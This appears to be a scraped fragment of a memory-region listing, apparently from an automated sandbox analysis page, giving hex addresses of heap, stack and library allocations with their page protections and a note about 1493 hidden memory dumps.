page read and write
|
||
1CBBF800000
|
heap
|
page read and write
|
||
19EE5CD6000
|
heap
|
page read and write
|
||
3611000
|
trusted library allocation
|
page read and write
|
||
2B18000
|
trusted library allocation
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
27811821000
|
trusted library allocation
|
page read and write
|
||
27811839000
|
trusted library allocation
|
page read and write
|
||
9E21FFE000
|
stack
|
page read and write
|
||
302B000
|
trusted library allocation
|
page read and write
|
||
9C83AF8000
|
stack
|
page read and write
|
||
D7B000
|
trusted library allocation
|
page execute and read and write
|
||
4DB0000
|
heap
|
page read and write
|
||
1CBBF801000
|
heap
|
page read and write
|
||
145F000
|
stack
|
page read and write
|
||
27802A02000
|
trusted library allocation
|
page read and write
|
||
64625FF000
|
stack
|
page read and write
|
||
1CBBF490000
|
heap
|
page read and write
|
||
169B5245000
|
trusted library allocation
|
page read and write
|
||
1CBBF800000
|
heap
|
page read and write
|
||
1CBBF854000
|
heap
|
page read and write
|
||
1940000
|
heap
|
page execute and read and write
|
||
1CA8B68C000
|
trusted library allocation
|
page read and write
|
||
19EE8704000
|
trusted library allocation
|
page read and write
|
||
27810647000
|
trusted library allocation
|
page read and write
|
||
1CBBF87D000
|
heap
|
page read and write
|
||
1CBBF800000
|
heap
|
page read and write
|
||
1CBBF873000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
There are 1493 hidden memdumps, click here to show them.